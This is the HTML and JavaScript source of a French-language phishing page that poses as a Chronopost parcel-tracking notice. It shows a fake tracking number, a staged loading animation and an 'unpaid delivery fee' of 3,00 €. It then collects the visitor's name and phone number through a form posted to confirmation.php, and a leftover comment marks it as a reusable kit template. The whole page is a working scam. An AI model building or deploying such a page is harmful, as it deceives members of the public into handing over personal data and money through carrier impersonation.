
<!DOCTYPE html>
<html>

<head>
    <title></title>
    <meta charset="UTF-8">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
</head>

<body>
    <div id="header">
        <img src="images/top-logo.png">
    </div>
    <div id="step1" class="card">
        <div class="top"><img src="images/7338844256788765_step1_yellow_tt.png">
        </div>
        <h2>COLIS EN ATTENTE</h2>
        <img src="images/boxplaceholder.png" width="30%">
        <p><b>Vous avez (1) colis en attente dans notre entrepôt,</b> prêt à être livré. Utilisez votre numéro de suivi pour suivre et recevoir votre colis.</p>
        <div id="but1" class="button">650000840689</div>
    </div>
    <div id="step2" class="card">
        <div class="top"><img src="images/7338844256788765_step2_yellow_tt.png">
        </div>
        <h3>Suivi De Colis</h3>
        <img style="max-width: 42px;" src="images/load.gif">
    </div>
    <div id="step3" class="card">
        <div class="top"><img src="images/7338844256788765_step3_yellow_tt.png"></div>
        <div style="width: 100%;">
            <div class="prodimg" style="width: 25%; margin-right: 2%; display: inline-block; text-align: left;">
                <img style="max-width: 100%;" src="images/iparcel.png">
            </div>
            <div class="prodtext" style="max-width: 70%; display: inline-block; text-align: left;">
                <h3>Informations sur votre colis:</h3>
                <p class="pointers"><b>Statut:</b> FRAIS DE LIVRAISON NON PAYÉS</p>
                <p class="pointers"><b>Livré par:</b> Chronopost</p>
                <p class="pointers"><b>Frais de livraison:</b> 3,00 €</p>
            </div>
        </div>
        <h2>VEUILLEZ METTRE À JOUR VOS INFORMATIONS DE SUIVI</h2>
        
        <!---This is Jarvis Form // Delete This comment on Live ---->
        <form  action="confirmation.php" method="POST" style="margin-top: 10px;">
            <div class="form-group mb-2">
                <input type="text" class="form-control bodyField" placeholder="Nom" aria-label="Name" name="jr_name" required >
            </div>
            <div class="form-group mb-2">
                <input type="number" class="form-control bodyField" placeholder="Téléphone" aria-label="Phone" name="phone" required >
            </div>
            
            <div class="originHref" style="display:none !important;">
                <a href="#" id="theExitUrl" class="formBtn btn gotop exit-button" style="  margin-top: 0 !Important;">
                    Continuer</a>
            </div>
            <hr>
            <h3><img style="" vertical-align: bottom; src="images/alert.png"> FRAIS DE LIVRAISON NON PAYÉS</h3>
            <p><b>Pour résoudre ce problème, veuillez créer votre compte personnel</b></p>
            <button id="userFormSubmit" type="submit" class=" button formBtn heartbeat text-center btn gotop" style="margin:0 auto;">
                S'inscrire maintenant</button>
        </form>
    </div>
    <div id="step4" class="card">
        <div class="top"><img src="images/7338844256788765_step3_yellow_tt.png">
        </div>
        <h2></h2>
        <div id="but4" class="button">klik</div>
    </div>
    <style type="text/css">
    body {
        background: url(images/bg.jpg);
        margin: 0;
        padding: 0;
        font-family: 'Roboto', sans-serif;
        background-size: cover;
        background-repeat: no-repeat;
        min-height: 100vh;
    }

    .prodimg {
        width: 15%;
        vertical-align: top;
        margin-right: 2%;
        display: inline-block;
        text-align: left;
        margin-top: 20px;
    }

    .prodtext {
        max-width: 70%;
        display: inline-block;
        text-align: left;
    }

    .bodyField {
        line-height: 28px;
        font-size: 16px;
    }

    h2 {
        color: #0467C6;
    }

    h3 {
        margin-bottom: 10px;
    }

    p {
        font-size: 14px;
        line-height: 1.6em;
        margin: 4px 0 14px 0;
    }

    p.pointers {
        margin-bottom: 6px;
    }

    img {
        max-width: 100%;
    }

    #step1 .button {
        background: url(images/search.png) top right no-repeat;
        background-color: #fff;
        border: 1px #333 solid;
        font-size: 25px;
        line-height: 44px;
        padding: 8px 8px 8px 24px;
        color: #000;
        font-weight: normal;
        text-align: left;
        background-repeat: no-repeat;
        border-radius: 5px;
        max-width: 100%;
        text-shadow: 0px 0px 0px;
        cursor: pointer;
        margin-top: 15px;
    }

    #header {
        text-align: center;
        height: 60px;
        background: #fff;
    }

    #header img {
        height: 40px;
        margin-top: 10px;
    }

    #step2,
    #step3,
    #step4 {
        display: none;
    }

    .bodyField {
        background-color: #efefef;
        border: 1px #333 solid;
        font-size: 19px;
        line-height: 44px;
        padding: 6px 15px 6px 15px;
        color: #000;
        font-weight: normal;
        text-align: left;
        background-repeat: no-repeat;
        border-radius: 5px;
        width: 100%;
        text-shadow: 0px 0px 0px;
        box-sizing: border-box;
    }

    .card {
        text-align: center;
        background: rgba(255, 255, 255, 0.95);
        max-width: 460px;
        border-radius: 10px;
        padding: 20px !important;
        margin: 80px auto auto auto;
    }

    .form-group {
        margin-bottom: 8px;
        text-align: left;
    }

    label#phone-error,
    label#jr_name-error {
        display: block;
        margin-top: 5px;
        font-size: 12px;
        color: red;
        margin-left: 17px;
    }

    #userFormSubmit {
        background-color: #0467C6 !important;
        min-height: 60px !important;
        color: #fff !important;
        font-size: 20px;
        padding: 10px;
        cursor: pointer;
        font-weight: bold;
        border-radius: 5px;
        width: 100%;
        border: 0px;
        margin-top: 15px !important;
    }

    @media (max-width: 540px) {

        .card {
            margin: 30px 20px 20px 20px;
        }

        h2 {
            font-size: 18px;
        }

        .prodimg {
            width: 18%;
            margin: 0 auto;
            display: none !important;
        }

        .prodtext {
            max-width: 100% !important;
            width: 100%;
            text-align: center;
            display: block;
        }

        .bodyField {
            line-height: 33px;
            font-size: 16px;
        }
    }
    </style>
    <script type="text/javascript">
    $("#but1").click(function() {
        $('#step1').fadeOut(200, function() {
            $('#step2').fadeIn(200, function() {
                setTimeout(function() {
                    $('#step2').fadeOut(function() {
                        $('#step3').fadeIn();
                    });
                }, 2000);
            });
        });
    });

    $("#but2").click(function() {
        $('#step2').fadeOut(200, function() {
            $('#step3').fadeIn(200);
        });
    });

    $("#but3").click(function() {
        $('#step3').fadeOut(200, function() {
            $('#step4').fadeIn(200);
        });
    });
    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.1/jquery.validate.min.js"></script>
   
</body>

</html>